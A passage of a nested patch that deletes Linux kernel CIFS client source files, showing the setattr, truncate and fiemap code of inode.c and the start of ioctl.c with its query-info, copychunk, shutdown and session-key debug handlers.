+-	 * If on a multiuser mount without unix extensions or cifsacl being
+-	 * enabled, and the admin hasn't overridden them, set the ownership
+-	 * to the fsuid/fsgid of the current process.
+-	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER) &&
+-	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
+-	    !tcon->unix_ext) {
+-		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID))
+-			stat->uid = current_fsuid();
+-		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID))
+-			stat->gid = current_fsgid();
+-	}
+-	return 0;
+-}
+-
+-int cifs_fiemap(struct inode *inode, struct fiemap_extent_info *fei, u64 start,
+-		u64 len)
+-{
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_i->netfs.inode.i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifsFileInfo *cfile;
+-	int rc;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	/*
+-	 * We need to be sure that all dirty pages are written as they
+-	 * might fill holes on the server.
+-	 */
+-	if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
+-	    inode->i_mapping->nrpages != 0) {
+-		rc = filemap_fdatawait(inode->i_mapping);
+-		if (rc) {
+-			mapping_set_error(inode->i_mapping, rc);
+-			return rc;
+-		}
+-	}
+-
+-	cfile = find_readable_file(cifs_i, false);
+-	if (cfile == NULL)
+-		return -EINVAL;
+-
+-	if (server->ops->fiemap) {
+-		rc = server->ops->fiemap(tcon, cfile, fei, start, len);
+-		cifsFileInfo_put(cfile);
+-		return rc;
+-	}
+-
+-	cifsFileInfo_put(cfile);
+-	return -ENOTSUPP;
+-}
+-
+-int cifs_truncate_page(struct address_space *mapping, loff_t from)
+-{
+-	pgoff_t index = from >> PAGE_SHIFT;
+-	unsigned offset = from & (PAGE_SIZE - 1);
+-	struct page *page;
+-	int rc = 0;
+-
+-	page = grab_cache_page(mapping, index);
+-	if (!page)
+-		return -ENOMEM;
+-
+-	zero_user_segment(page, offset, PAGE_SIZE);
+-	unlock_page(page);
+-	put_page(page);
+-	return rc;
+-}
+-
+-void cifs_setsize(struct inode *inode, loff_t offset)
+-{
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-
+-	spin_lock(&inode->i_lock);
+-	i_size_write(inode, offset);
+-	spin_unlock(&inode->i_lock);
+-
+-	/* Cached inode must be refreshed on truncate */
+-	cifs_i->time = 0;
+-	truncate_pagecache(inode, offset);
+-}
+-
+-static int
+-cifs_set_file_size(struct inode *inode, struct iattr *attrs,
+-		   unsigned int xid, const char *full_path)
+-{
+-	int rc;
+-	struct cifsFileInfo *open_file;
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon = NULL;
+-	struct TCP_Server_Info *server;
+-
+-	/*
+-	 * To avoid spurious oplock breaks from server, in the case of
+-	 * inodes that we already have open, avoid doing path based
+-	 * setting of file size if we can do it by handle.
+-	 * This keeps our caching token (oplock) and avoids timeouts
+-	 * when the local oplock break takes longer to flush
+-	 * writebehind data than the SMB timeout for the SetPathInfo
+-	 * request would allow
+-	 */
+-	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
+-	if (open_file) {
+-		tcon = tlink_tcon(open_file->tlink);
+-		server = tcon->ses->server;
+-		if (server->ops->set_file_size)
+-			rc = server->ops->set_file_size(xid, tcon, open_file,
+-							attrs->ia_size, false);
+-		else
+-			rc = -ENOSYS;
+-		cifsFileInfo_put(open_file);
+-		cifs_dbg(FYI, "SetFSize for attrs rc = %d\n", rc);
+-	} else
+-		rc = -EINVAL;
+-
+-	if (!rc)
+-		goto set_size_out;
+-
+-	if (tcon == NULL) {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink))
+-			return PTR_ERR(tlink);
+-		tcon = tlink_tcon(tlink);
+-		server = tcon->ses->server;
+-	}
+-
+-	/*
+-	 * Set file size by pathname rather than by handle either because no
+-	 * valid, writeable file handle for it was found or because there was
+-	 * an error setting it by handle.
+-	 */
+-	if (server->ops->set_path_size)
+-		rc = server->ops->set_path_size(xid, tcon, full_path,
+-						attrs->ia_size, cifs_sb, false);
+-	else
+-		rc = -ENOSYS;
+-	cifs_dbg(FYI, "SetEOF by path (setattrs) rc = %d\n", rc);
+-
+-	if (tlink)
+-		cifs_put_tlink(tlink);
+-
+-set_size_out:
+-	if (rc == 0) {
+-		cifsInode->server_eof = attrs->ia_size;
+-		cifs_setsize(inode, attrs->ia_size);
+-		/*
+-		 * i_blocks is not related to (i_size / i_blksize), but instead
+-		 * 512 byte (2**9) size is required for calculating num blocks.
+-		 * Until we can query the server for actual allocation size,
+-		 * this is best estimate we have for blocks allocated for a file
+-		 * Number of blocks must be rounded up so size 1 is not 0 blocks
+-		 */
+-		inode->i_blocks = (512 - 1 + attrs->ia_size) >> 9;
+-
+-		/*
+-		 * The man page of truncate says if the size changed,
+-		 * then the st_ctime and st_mtime fields for the file
+-		 * are updated.
+-		 */
+-		attrs->ia_ctime = attrs->ia_mtime = current_time(inode);
+-		attrs->ia_valid |= ATTR_CTIME | ATTR_MTIME;
+-
+-		cifs_truncate_page(inode->i_mapping, inode->i_size);
+-	}
+-
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_setattr_unix(struct dentry *direntry, struct iattr *attrs)
+-{
+-	int rc;
+-	unsigned int xid;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct inode *inode = d_inode(direntry);
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	struct cifs_unix_set_info_args *args = NULL;
+-	struct cifsFileInfo *open_file;
+-
+-	cifs_dbg(FYI, "setattr_unix on file %pd attrs->ia_valid=0x%x\n",
+-		 direntry, attrs->ia_valid);
+-
+-	xid = get_xid();
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
+-		attrs->ia_valid |= ATTR_FORCE;
+-
+-	rc = setattr_prepare(&init_user_ns, direntry, attrs);
+-	if (rc < 0)
+-		goto out;
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	/*
+-	 * Attempt to flush data before changing attributes. We need to do
+-	 * this for ATTR_SIZE and ATTR_MTIME for sure, and if we change the
+-	 * ownership or mode then we may also need to do this. Here, we take
+-	 * the safe way out and just do the flush on all setattr requests. If
+-	 * the flush returns error, store it to report later and continue.
+-	 *
+-	 * BB: This should be smarter. Why bother flushing pages that
+-	 * will be truncated anyway? Also, should we error out here if
+-	 * the flush returns error?
+-	 */
+-	rc = filemap_write_and_wait(inode->i_mapping);
+-	if (is_interrupt_error(rc)) {
+-		rc = -ERESTARTSYS;
+-		goto out;
+-	}
+-
+-	mapping_set_error(inode->i_mapping, rc);
+-	rc = 0;
+-
+-	if (attrs->ia_valid & ATTR_SIZE) {
+-		rc = cifs_set_file_size(inode, attrs, xid, full_path);
+-		if (rc != 0)
+-			goto out;
+-	}
+-
+-	/* skip mode change if it's just for clearing setuid/setgid */
+-	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
+-		attrs->ia_valid &= ~ATTR_MODE;
+-
+-	args = kmalloc(sizeof(*args), GFP_KERNEL);
+-	if (args == NULL) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	/* set up the struct */
+-	if (attrs->ia_valid & ATTR_MODE)
+-		args->mode = attrs->ia_mode;
+-	else
+-		args->mode = NO_CHANGE_64;
+-
+-	if (attrs->ia_valid & ATTR_UID)
+-		args->uid = attrs->ia_uid;
+-	else
+-		args->uid = INVALID_UID; /* no change */
+-
+-	if (attrs->ia_valid & ATTR_GID)
+-		args->gid = attrs->ia_gid;
+-	else
+-		args->gid = INVALID_GID; /* no change */
+-
+-	if (attrs->ia_valid & ATTR_ATIME)
+-		args->atime = cifs_UnixTimeToNT(attrs->ia_atime);
+-	else
+-		args->atime = NO_CHANGE_64;
+-
+-	if (attrs->ia_valid & ATTR_MTIME)
+-		args->mtime = cifs_UnixTimeToNT(attrs->ia_mtime);
+-	else
+-		args->mtime = NO_CHANGE_64;
+-
+-	if (attrs->ia_valid & ATTR_CTIME)
+-		args->ctime = cifs_UnixTimeToNT(attrs->ia_ctime);
+-	else
+-		args->ctime = NO_CHANGE_64;
+-
+-	args->device = 0;
+-	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
+-	if (open_file) {
+-		u16 nfid = open_file->fid.netfid;
+-		u32 npid = open_file->pid;
+-		pTcon = tlink_tcon(open_file->tlink);
+-		rc = CIFSSMBUnixSetFileInfo(xid, pTcon, args, nfid, npid);
+-		cifsFileInfo_put(open_file);
+-	} else {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink)) {
+-			rc = PTR_ERR(tlink);
+-			goto out;
+-		}
+-		pTcon = tlink_tcon(tlink);
+-		rc = CIFSSMBUnixSetPathInfo(xid, pTcon, full_path, args,
+-				    cifs_sb->local_nls,
+-				    cifs_remap(cifs_sb));
+-		cifs_put_tlink(tlink);
+-	}
+-
+-	if (rc)
+-		goto out;
+-
+-	if ((attrs->ia_valid & ATTR_SIZE) &&
+-	    attrs->ia_size != i_size_read(inode)) {
+-		truncate_setsize(inode, attrs->ia_size);
+-		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, attrs);
+-	mark_inode_dirty(inode);
+-
+-	/* force revalidate when any of these times are set since some
+-	   of the fs types (eg ext3, fat) do not have fine enough
+-	   time granularity to match protocol, and we do not have a
+-	   a way (yet) to query the server fs's time granularity (and
+-	   whether it rounds times down).
+-	*/
+-	if (attrs->ia_valid & (ATTR_MTIME | ATTR_CTIME))
+-		cifsInode->time = 0;
+-out:
+-	kfree(args);
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_setattr_nounix(struct dentry *direntry, struct iattr *attrs)
+-{
+-	unsigned int xid;
+-	kuid_t uid = INVALID_UID;
+-	kgid_t gid = INVALID_GID;
+-	struct inode *inode = d_inode(direntry);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifsFileInfo *wfile;
+-	struct cifs_tcon *tcon;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	int rc = -EACCES;
+-	__u32 dosattr = 0;
+-	__u64 mode = NO_CHANGE_64;
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "setattr on file %pd attrs->ia_valid 0x%x\n",
+-		 direntry, attrs->ia_valid);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
+-		attrs->ia_valid |= ATTR_FORCE;
+-
+-	rc = setattr_prepare(&init_user_ns, direntry, attrs);
+-	if (rc < 0)
+-		goto cifs_setattr_exit;
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto cifs_setattr_exit;
+-	}
+-
+-	/*
+-	 * Attempt to flush data before changing attributes. We need to do
+-	 * this for ATTR_SIZE and ATTR_MTIME.  If the flush of the data
+-	 * returns error, store it to report later and continue.
+-	 *
+-	 * BB: This should be smarter. Why bother flushing pages that
+-	 * will be truncated anyway? Also, should we error out here if
+-	 * the flush returns error? Do we need to check for ATTR_MTIME_SET flag?
+-	 */
+-	if (attrs->ia_valid & (ATTR_MTIME | ATTR_SIZE | ATTR_CTIME)) {
+-		rc = filemap_write_and_wait(inode->i_mapping);
+-		if (is_interrupt_error(rc)) {
+-			rc = -ERESTARTSYS;
+-			goto cifs_setattr_exit;
+-		}
+-		mapping_set_error(inode->i_mapping, rc);
+-	}
+-
+-	rc = 0;
+-
+-	if ((attrs->ia_valid & ATTR_MTIME) &&
+-	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
+-		rc = cifs_get_writable_file(cifsInode, FIND_WR_ANY, &wfile);
+-		if (!rc) {
+-			tcon = tlink_tcon(wfile->tlink);
+-			rc = tcon->ses->server->ops->flush(xid, tcon, &wfile->fid);
+-			cifsFileInfo_put(wfile);
+-			if (rc)
+-				goto cifs_setattr_exit;
+-		} else if (rc != -EBADF)
+-			goto cifs_setattr_exit;
+-		else
+-			rc = 0;
+-	}
+-
+-	if (attrs->ia_valid & ATTR_SIZE) {
+-		rc = cifs_set_file_size(inode, attrs, xid, full_path);
+-		if (rc != 0)
+-			goto cifs_setattr_exit;
+-	}
+-
+-	if (attrs->ia_valid & ATTR_UID)
+-		uid = attrs->ia_uid;
+-
+-	if (attrs->ia_valid & ATTR_GID)
+-		gid = attrs->ia_gid;
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
+-	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
+-		if (uid_valid(uid) || gid_valid(gid)) {
+-			mode = NO_CHANGE_64;
+-			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
+-							uid, gid);
+-			if (rc) {
+-				cifs_dbg(FYI, "%s: Setting id failed with error: %d\n",
+-					 __func__, rc);
+-				goto cifs_setattr_exit;
+-			}
+-		}
+-	} else
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID))
+-		attrs->ia_valid &= ~(ATTR_UID | ATTR_GID);
+-
+-	/* skip mode change if it's just for clearing setuid/setgid */
+-	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
+-		attrs->ia_valid &= ~ATTR_MODE;
+-
+-	if (attrs->ia_valid & ATTR_MODE) {
+-		mode = attrs->ia_mode;
+-		rc = 0;
+-		if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
+-			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
+-						INVALID_UID, INVALID_GID);
+-			if (rc) {
+-				cifs_dbg(FYI, "%s: Setting ACL failed with error: %d\n",
+-					 __func__, rc);
+-				goto cifs_setattr_exit;
+-			}
+-
+-			/*
+-			 * In case of CIFS_MOUNT_CIFS_ACL, we cannot support all modes.
+-			 * Pick up the actual mode bits that were set.
+-			 */
+-			if (mode != attrs->ia_mode)
+-				attrs->ia_mode = mode;
+-		} else
+-		if (((mode & S_IWUGO) == 0) &&
+-		    (cifsInode->cifsAttrs & ATTR_READONLY) == 0) {
+-
+-			dosattr = cifsInode->cifsAttrs | ATTR_READONLY;
+-
+-			/* fix up mode if we're not using dynperm */
+-			if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM) == 0)
+-				attrs->ia_mode = inode->i_mode & ~S_IWUGO;
+-		} else if ((mode & S_IWUGO) &&
+-			   (cifsInode->cifsAttrs & ATTR_READONLY)) {
+-
+-			dosattr = cifsInode->cifsAttrs & ~ATTR_READONLY;
+-			/* Attributes of 0 are ignored */
+-			if (dosattr == 0)
+-				dosattr |= ATTR_NORMAL;
+-
+-			/* reset local inode permissions to normal */
+-			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
+-				attrs->ia_mode &= ~(S_IALLUGO);
+-				if (S_ISDIR(inode->i_mode))
+-					attrs->ia_mode |=
+-						cifs_sb->ctx->dir_mode;
+-				else
+-					attrs->ia_mode |=
+-						cifs_sb->ctx->file_mode;
+-			}
+-		} else if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
+-			/* ignore mode change - ATTR_READONLY hasn't changed */
+-			attrs->ia_valid &= ~ATTR_MODE;
+-		}
+-	}
+-
+-	if (attrs->ia_valid & (ATTR_MTIME|ATTR_ATIME|ATTR_CTIME) ||
+-	    ((attrs->ia_valid & ATTR_MODE) && dosattr)) {
+-		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
+-		/* BB: check for rc = -EOPNOTSUPP and switch to legacy mode */
+-
+-		/* Even if error on time set, no sense failing the call if
+-		the server would set the time to a reasonable value anyway,
+-		and this check ensures that we are not being called from
+-		sys_utimes in which case we ought to fail the call back to
+-		the user when the server rejects the call */
+-		if ((rc) && (attrs->ia_valid &
+-				(ATTR_MODE | ATTR_GID | ATTR_UID | ATTR_SIZE)))
+-			rc = 0;
+-	}
+-
+-	/* do not need local check to inode_check_ok since the server does
+-	   that */
+-	if (rc)
+-		goto cifs_setattr_exit;
+-
+-	if ((attrs->ia_valid & ATTR_SIZE) &&
+-	    attrs->ia_size != i_size_read(inode)) {
+-		truncate_setsize(inode, attrs->ia_size);
+-		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, attrs);
+-	mark_inode_dirty(inode);
+-
+-cifs_setattr_exit:
+-	free_xid(xid);
+-	free_dentry_path(page);
+-	return rc;
+-}
+-
+-int
+-cifs_setattr(struct user_namespace *mnt_userns, struct dentry *direntry,
+-	     struct iattr *attrs)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	int rc, retries = 0;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_tcon *pTcon = cifs_sb_master_tcon(cifs_sb);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	do {
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-		if (pTcon->unix_ext)
+-			rc = cifs_setattr_unix(direntry, attrs);
+-		else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-			rc = cifs_setattr_nounix(direntry, attrs);
+-		retries++;
+-	} while (is_retryable_error(rc) && retries < 2);
+-
+-	/* BB: add cifs_setattr_legacy for really old servers */
+-	return rc;
+-}
+diff --git a/fs/cifs/ioctl.c b/fs/cifs/ioctl.c
+deleted file mode 100644
+index 6419ec47c2a85..0000000000000
+--- a/fs/cifs/ioctl.c
++++ /dev/null
+@@ -1,526 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   vfs operations that deal with io control
+- *
+- *   Copyright (C) International Business Machines  Corp., 2005,2013
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/file.h>
+-#include <linux/mount.h>
+-#include <linux/mm.h>
+-#include <linux/pagemap.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifsfs.h"
+-#include "cifs_ioctl.h"
+-#include "smb2proto.h"
+-#include "smb2glob.h"
+-#include <linux/btrfs.h>
+-
+-static long cifs_ioctl_query_info(unsigned int xid, struct file *filep,
+-				  unsigned long p)
+-{
+-	struct inode *inode = file_inode(filep);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct dentry *dentry = filep->f_path.dentry;
+-	const unsigned char *path;
+-	void *page = alloc_dentry_path();
+-	__le16 *utf16_path = NULL, root_path;
+-	int rc = 0;
+-
+-	path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(path)) {
+-		free_dentry_path(page);
+-		return PTR_ERR(path);
+-	}
+-
+-	cifs_dbg(FYI, "%s %s\n", __func__, path);
+-
+-	if (!path[0]) {
+-		root_path = 0;
+-		utf16_path = &root_path;
+-	} else {
+-		utf16_path = cifs_convert_path_to_utf16(path + 1, cifs_sb);
+-		if (!utf16_path) {
+-			rc = -ENOMEM;
+-			goto ici_exit;
+-		}
+-	}
+-
+-	if (tcon->ses->server->ops->ioctl_query_info)
+-		rc = tcon->ses->server->ops->ioctl_query_info(
+-				xid, tcon, cifs_sb, utf16_path,
+-				filep->private_data ? 0 : 1, p);
+-	else
+-		rc = -EOPNOTSUPP;
+-
+- ici_exit:
+-	if (utf16_path != &root_path)
+-		kfree(utf16_path);
+-	free_dentry_path(page);
+-	return rc;
+-}
+-
+-static long cifs_ioctl_copychunk(unsigned int xid, struct file *dst_file,
+-			unsigned long srcfd)
+-{
+-	int rc;
+-	struct fd src_file;
+-	struct inode *src_inode;
+-
+-	cifs_dbg(FYI, "ioctl copychunk range\n");
+-	/* the destination must be opened for writing */
+-	if (!(dst_file->f_mode & FMODE_WRITE)) {
+-		cifs_dbg(FYI, "file target not open for write\n");
+-		return -EINVAL;
+-	}
+-
+-	/* check if target volume is readonly and take reference */
+-	rc = mnt_want_write_file(dst_file);
+-	if (rc) {
+-		cifs_dbg(FYI, "mnt_want_write failed with rc %d\n", rc);
+-		return rc;
+-	}
+-
+-	src_file = fdget(srcfd);
+-	if (!src_file.file) {
+-		rc = -EBADF;
+-		goto out_drop_write;
+-	}
+-
+-	if (src_file.file->f_op->unlocked_ioctl != cifs_ioctl) {
+-		rc = -EBADF;
+-		cifs_dbg(VFS, "src file seems to be from a different filesystem type\n");
+-		goto out_fput;
+-	}
+-
+-	src_inode = file_inode(src_file.file);
+-	rc = -EINVAL;
+-	if (S_ISDIR(src_inode->i_mode))
+-		goto out_fput;
+-
+-	rc = cifs_file_copychunk_range(xid, src_file.file, 0, dst_file, 0,
+-					src_inode->i_size, 0);
+-	if (rc > 0)
+-		rc = 0;
+-out_fput:
+-	fdput(src_file);
+-out_drop_write:
+-	mnt_drop_write_file(dst_file);
+-	return rc;
+-}
+-
+-static long smb_mnt_get_fsinfo(unsigned int xid, struct cifs_tcon *tcon,
+-				void __user *arg)
+-{
+-	int rc = 0;
+-	struct smb_mnt_fs_info *fsinf;
+-
+-	fsinf = kzalloc(sizeof(struct smb_mnt_fs_info), GFP_KERNEL);
+-	if (fsinf == NULL)
+-		return -ENOMEM;
+-
+-	fsinf->version = 1;
+-	fsinf->protocol_id = tcon->ses->server->vals->protocol_id;
+-	fsinf->device_characteristics =
+-			le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics);
+-	fsinf->device_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
+-	fsinf->fs_attributes = le32_to_cpu(tcon->fsAttrInfo.Attributes);
+-	fsinf->max_path_component =
+-		le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
+-	fsinf->vol_serial_number = tcon->vol_serial_number;
+-	fsinf->vol_create_time = le64_to_cpu(tcon->vol_create_time);
+-	fsinf->share_flags = tcon->share_flags;
+-	fsinf->share_caps = le32_to_cpu(tcon->capabilities);
+-	fsinf->sector_flags = tcon->ss_flags;
+-	fsinf->optimal_sector_size = tcon->perf_sector_size;
+-	fsinf->max_bytes_chunk = tcon->max_bytes_chunk;
+-	fsinf->maximal_access = tcon->maximal_access;
+-	fsinf->cifs_posix_caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-
+-	if (copy_to_user(arg, fsinf, sizeof(struct smb_mnt_fs_info)))
+-		rc = -EFAULT;
+-
+-	kfree(fsinf);
+-	return rc;
+-}
+-
+-static int cifs_shutdown(struct super_block *sb, unsigned long arg)
+-{
+-	struct cifs_sb_info *sbi = CIFS_SB(sb);
+-	__u32 flags;
+-
+-	if (!capable(CAP_SYS_ADMIN))
+-		return -EPERM;
+-
+-	if (get_user(flags, (__u32 __user *)arg))
+-		return -EFAULT;
+-
+-	if (flags > CIFS_GOING_FLAGS_NOLOGFLUSH)
+-		return -EINVAL;
+-
+-	if (cifs_forced_shutdown(sbi))
+-		return 0;
+-
+-	cifs_dbg(VFS, "shut down requested (%d)", flags);
+-/*	trace_cifs_shutdown(sb, flags);*/
+-
+-	/*
+-	 * see:
+-	 *   https://man7.org/linux/man-pages/man2/ioctl_xfs_goingdown.2.html
+-	 * for more information and description of original intent of the flags
+-	 */
+-	switch (flags) {
+-	/*
+-	 * We could add support later for default flag which requires:
+-	 *     "Flush all dirty data and metadata to disk"
+-	 * would need to call syncfs or equivalent to flush page cache for
+-	 * the mount and then issue fsync to server (if nostrictsync not set)
+-	 */
+-	case CIFS_GOING_FLAGS_DEFAULT:
+-		cifs_dbg(FYI, "shutdown with default flag not supported\n");
+-		return -EINVAL;
+-	/*
+-	 * FLAGS_LOGFLUSH is easy since it asks to write out metadata (not
+-	 * data) but metadata writes are not cached on the client, so can treat
+-	 * it similarly to NOLOGFLUSH
+-	 */
+-	case CIFS_GOING_FLAGS_LOGFLUSH:
+-	case CIFS_GOING_FLAGS_NOLOGFLUSH:
+-		sbi->mnt_cifs_flags |= CIFS_MOUNT_SHUTDOWN;
+-		return 0;
+-	default:
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-static int cifs_dump_full_key(struct cifs_tcon *tcon, struct smb3_full_key_debug_info __user *in)
+-{
+-	struct smb3_full_key_debug_info out;
+-	struct cifs_ses *ses;
+-	int rc = 0;
+-	bool found = false;
+-	u8 __user *end;
+-
+-	if (!smb3_encryption_required(tcon)) {
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* copy user input into our output buffer */
+-	if (copy_from_user(&out, in, sizeof(out))) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	if (!out.session_id) {
+-		/* if ses id is 0, use current user session */
+-		ses = tcon->ses;
+-	} else {
+-		/* otherwise if a session id is given, look for it in all our sessions */
+-		struct cifs_ses *ses_it = NULL;
+-		struct TCP_Server_Info *server_it = NULL;
+-
+-		spin_lock(&cifs_tcp_ses_lock);
+-		list_for_each_entry(server_it, &cifs_tcp_ses_list, tcp_ses_list) {
+-			list_for_each_entry(ses_it, &server_it->smb_ses_list, smb_ses_list) {
+-				if (ses_it->Suid == out.session_id) {
+-					ses = ses_it;
+-					/*
+-					 * since we are using the session outside the crit
+-					 * section, we need to make sure it won't be released
+-					 * so increment its refcount
+-					 */
+-					ses->ses_count++;
+-					found = true;
+-					goto search_end;
+-				}
+-			}
+-		}
+-search_end:
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		if (!found) {
+-			rc = -ENOENT;
+-			goto out;
+-		}
+-	}
+-
+-	switch (ses->server->cipher_type) {
+-	case SMB2_ENCRYPTION_AES128_CCM:
+-	case SMB2_ENCRYPTION_AES128_GCM:
+-		out.session_key_length = CIFS_SESS_KEY_SIZE;
+-		out.server_in_key_length = out.server_out_key_length = SMB3_GCM128_CRYPTKEY_SIZE;
+-		break;
+-	case SMB2_ENCRYPTION_AES256_CCM:
+-	case SMB2_ENCRYPTION_AES256_GCM:
+-		out.session_key_length = CIFS_SESS_KEY_SIZE;
+-		out.server_in_key_length = out.server_out_key_length = SMB3_GCM256_CRYPTKEY_SIZE;
+-		break;
+-	default:
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* check if user buffer is big enough to store all the keys */
+-	if (out.in_size < sizeof(out) + out.session_key_length + out.server_in_key_length
+-	    + out.server_out_key_length) {
+-		rc = -ENOBUFS;
+-		goto out;
+-	}
+-
+-	out.session_id = ses->Suid;
+-	out.cipher_type = le16_to_cpu(ses->server->cipher_type);
+-
+-	/* overwrite user input with our output */
+-	if (copy_to_user(in, &out, sizeof(out))) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	/* append all the keys at the end of the user buffer */
+-	end = in->data;
+-	if (copy_to_user(end, ses->auth_key.response, out.session_key_length)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	end += out.session_key_length;
+-
+-	if (copy_to_user(end, ses->smb3encryptionkey, out.server_in_key_length)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	end += out.server_in_key_length;
+-
+-	if (copy_to_user(end, ses->smb3decryptionkey, out.server_out_key_length)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-out:
+-	if (found)
+-		cifs_put_smb_ses(ses);
+-	return rc;
+-}
+-
+-long cifs_ioctl(struct file *filep, unsigned int command, unsigned long arg)
+-{
+-	struct inode *inode = file_inode(filep);
+-	struct smb3_key_debug_info pkey_inf;
+-	int rc = -ENOTTY; /* strange error - but the precedent */
+-	unsigned int xid;
+-	struct cifsFileInfo *pSMBFile = filep->private_data;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb;
+-	__u64	ExtAttrBits = 0;
+-	__u64   caps;
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "cifs ioctl 0x%x\n", command);
+-	switch (command) {
+-		case FS_IOC_GETFLAGS:
+-			if (pSMBFile == NULL)
+-				break;
+-			tcon = tlink_tcon(pSMBFile->tlink);
+-			caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-#ifdef CONFIG_CIFS_POSIX
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-			if (CIFS_UNIX_EXTATTR_CAP & caps) {
+-				__u64	ExtAttrMask = 0;
+-				rc = CIFSGetExtAttr(xid, tcon,
+-						    pSMBFile->fid.netfid,
